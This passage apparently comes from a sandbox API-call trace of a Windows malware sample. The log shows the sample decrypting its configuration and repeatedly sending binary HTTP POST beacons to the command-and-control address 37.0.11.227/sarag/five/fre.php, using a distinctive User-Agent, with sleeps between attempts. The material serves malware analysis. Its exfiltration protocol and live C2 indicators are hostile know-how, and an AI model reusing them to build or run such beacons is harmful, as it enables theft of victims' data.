RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0306.468] socket (af=2, type=1, protocol=6) returned 0xa30 [0306.469] connect (s=0xa30, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0306.495] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0306.496] GetProcessHeap () returned 0x690000 [0306.496] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0306.496] GetProcessHeap () returned 0x690000 [0306.496] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0306.496] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0306.500] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0306.500] GetProcessHeap () returned 0x690000 [0306.500] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0306.500] GetProcessHeap () returned 0x690000 [0306.501] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0306.501] GetProcessHeap () returned 0x690000 [0306.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0306.501] GetProcessHeap () returned 0x690000 [0306.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0306.502] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0306.503] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0306.503] GetProcessHeap () returned 0x690000 [0306.503] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0306.503] GetProcessHeap () returned 0x690000 [0306.503] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0306.503] send (s=0xa30, buf=0x6ad508*, len=242, flags=0) returned 242 [0306.504] send (s=0xa30, buf=0x6aba40*, len=159, flags=0) returned 159 [0306.504] GetProcessHeap () returned 0x690000 [0306.504] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0306.504] recv (in: s=0xa30, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0306.640] GetProcessHeap () returned 0x690000 [0306.640] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0306.641] GetProcessHeap () returned 0x690000 [0306.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0306.641] GetProcessHeap () returned 0x690000 [0306.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0306.641] GetProcessHeap () returned 0x690000 [0306.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0306.642] closesocket (s=0xa30) returned 0 [0306.642] GetProcessHeap () returned 0x690000 [0306.642] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0306.642] GetProcessHeap () returned 0x690000 [0306.643] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0306.643] GetProcessHeap () returned 0x690000 [0306.643] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0306.643] GetProcessHeap () returned 0x690000 [0306.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0306.644] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1790) returned 0xa30 [0306.646] Sleep (dwMilliseconds=0xea60) [0306.647] GetProcessHeap () returned 0x690000 [0306.647] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0306.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.649] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.660] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0306.671] GetProcessHeap () returned 0x690000 [0306.671] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0306.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.682] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0306.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.683] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.684] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.684] GetProcessHeap () returned 0x690000 [0306.685] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0306.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.686] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0306.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.687] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0306.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.689] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0306.689] GetProcessHeap () returned 0x690000 [0306.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0306.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.690] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.691] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.692] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.693] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0306.693] GetProcessHeap () returned 0x690000 [0306.693] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0306.693] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0306.694] GetProcessHeap () returned 0x690000 [0306.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0306.696] GetProcessHeap () returned 0x690000 [0306.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0306.697] GetProcessHeap () returned 0x690000 [0306.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0306.697] GetProcessHeap () returned 0x690000 [0306.697] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0306.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.698] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.712] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0306.720] GetProcessHeap () returned 0x690000 [0306.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0306.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.722] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0306.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.723] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.723] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.723] GetProcessHeap () returned 0x690000 [0306.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0306.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.725] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0306.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.725] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0306.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.727] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0306.727] GetProcessHeap () returned 0x690000 [0306.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0306.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.728] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0306.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.729] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0306.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.730] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0306.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.731] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0306.731] GetProcessHeap () returned 0x690000 [0306.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0306.731] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0306.731] GetProcessHeap () returned 0x690000 [0306.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0306.731] socket (af=2, type=1, protocol=6) returned 0xa34 [0306.732] connect (s=0xa34, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0306.752] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0306.752] GetProcessHeap () returned 0x690000 [0306.752] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0306.752] GetProcessHeap () returned 0x690000 [0306.752] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0306.753] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0306.754] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0306.754] GetProcessHeap () returned 0x690000 [0306.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0306.754] GetProcessHeap () returned 0x690000 [0306.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0306.754] GetProcessHeap () returned 0x690000 [0306.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0306.754] GetProcessHeap () returned 0x690000 [0306.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0306.755] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0306.755] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0306.755] GetProcessHeap () returned 0x690000 [0306.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0306.755] GetProcessHeap () returned 0x690000 [0306.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0306.756] send (s=0xa34, buf=0x6ad508*, len=242, flags=0) returned 242 [0306.756] send (s=0xa34, buf=0x6aba40*, len=159, flags=0) returned 159 [0306.756] GetProcessHeap () returned 0x690000 [0306.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0306.756] recv (in: s=0xa34, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0306.833] GetProcessHeap () returned 0x690000 [0306.833] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0306.833] GetProcessHeap () returned 0x690000 [0306.833] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0306.833] GetProcessHeap () returned 0x690000 [0306.834] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0306.834] GetProcessHeap () returned 0x690000 [0306.834] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0306.834] closesocket (s=0xa34) returned 0 [0306.834] GetProcessHeap () returned 0x690000 [0306.834] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0306.834] GetProcessHeap () returned 0x690000 [0306.834] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0306.835] GetProcessHeap () returned 0x690000 [0306.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0306.835] GetProcessHeap () returned 0x690000 [0306.835] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0306.836] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1778) returned 0xa34 [0306.837] Sleep (dwMilliseconds=0xea60) [0306.839] GetProcessHeap () returned 0x690000 [0306.839] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0306.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.840] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.844] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0306.848] GetProcessHeap () returned 0x690000 [0306.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0306.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.849] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0306.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.850] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.851] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.851] GetProcessHeap () returned 0x690000 [0306.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0306.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.852] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0306.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.853] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0306.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.854] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0306.854] GetProcessHeap () returned 0x690000 [0306.854] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0306.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.855] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.856] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.857] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.857] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0306.857] GetProcessHeap () returned 0x690000 [0306.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0306.858] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0306.858] GetProcessHeap () returned 0x690000 [0306.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0306.858] GetProcessHeap () returned 0x690000 [0306.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0306.858] GetProcessHeap () returned 0x690000 [0306.858] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0306.858] GetProcessHeap () returned 0x690000 [0306.858] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0306.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.864] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0306.869] GetProcessHeap () returned 0x690000 [0306.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0306.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.870] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0306.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.871] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.871] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.871] GetProcessHeap () returned 0x690000 [0306.876] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0306.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.877] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0307.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.144] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0307.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.145] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0307.145] GetProcessHeap () returned 0x690000 [0307.145] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0307.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.146] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0307.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.147] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0307.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.148] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0307.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.149] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0307.149] GetProcessHeap () returned 0x690000 [0307.149] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0307.149] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0307.149] GetProcessHeap () returned 0x690000 [0307.149] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0307.149] socket (af=2, type=1, protocol=6) returned 0xa38 [0307.150] connect (s=0xa38, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0307.179] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0307.179] GetProcessHeap () returned 0x690000 [0307.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0307.179] GetProcessHeap () returned 0x690000 [0307.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0307.180] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0307.181] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 